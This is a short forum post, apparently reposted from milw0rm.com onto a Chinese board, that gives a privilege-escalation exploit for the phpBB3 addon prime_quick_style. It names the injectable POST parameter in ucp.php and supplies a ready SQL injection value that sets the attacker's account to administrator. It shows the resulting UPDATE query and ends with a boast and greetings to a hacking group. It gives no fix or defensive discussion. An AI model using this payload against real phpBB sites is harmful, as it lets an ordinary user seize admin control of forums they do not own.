发新话题
打印

[Web apps] phpBB3 addon prime_quick_style GetAdmin Vulnerability

phpBB3 addon prime_quick_style GetAdmin Vulnerability

原始出处:milw0rm.com
##########################################################################
#
#        phpBB3 addon prime_quick_style GetAdmin Exploit
#
#        Vulnerability found and exploited by -SmoG-
#
#        target file: prime_quick_style.php
#
#
#   vuln: POST parameter "prime_quick_style" is injectable.
#   source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
#        HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
#        example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
#  
#        query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
#        gratz, now u will be an admin  :)
#
#        --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
#                                                                                                                -( by -SmoG- )-
##########################################################################

TOP

发新话题